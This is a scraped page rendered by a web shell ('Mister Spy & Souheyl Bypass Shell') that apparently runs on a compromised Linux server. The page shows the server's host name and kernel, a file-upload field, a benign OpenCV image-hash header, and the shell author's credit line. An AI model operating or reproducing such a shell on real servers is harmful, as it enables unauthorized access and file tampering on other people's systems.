Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /usr/include/opencv4/opencv2/img_hash/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : //usr/include/opencv4/opencv2/img_hash/img_hash_base.hpp

// This file is part of OpenCV project.
// It is subject to the license terms in the LICENSE file found in the top-level directory
// of this distribution and at http://opencv.org/license.html.

#ifndef OPENCV_IMG_HASH_BASE_HPP
#define OPENCV_IMG_HASH_BASE_HPP

#include "opencv2/core.hpp"

namespace cv {
namespace img_hash {

//! @addtogroup img_hash
//! @{

/** @brief The base class for image hash algorithms
 */
class CV_EXPORTS_W ImgHashBase : public Algorithm
{
public:
    class ImgHashImpl;

    ~ImgHashBase();
    /** @brief Computes hash of the input image
        @param inputArr input image want to compute hash value
        @param outputArr hash of the image
    */
    CV_WRAP void compute(cv::InputArray inputArr, cv::OutputArray outputArr);
    /** @brief Compare the hash value between inOne and inTwo
        @param hashOne Hash value one
        @param hashTwo Hash value two
        @return value indicate similarity between inOne and inTwo, the meaning
        of the value vary from algorithms to algorithms
    */
    CV_WRAP double compare(cv::InputArray hashOne, cv::InputArray hashTwo) const;
protected:
    ImgHashBase();
protected:
    Ptr<ImgHashImpl> pImpl;
};

//! @}

} } // cv::img_hash::

#endif // OPENCV_IMG_HASH_BASE_HPP

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net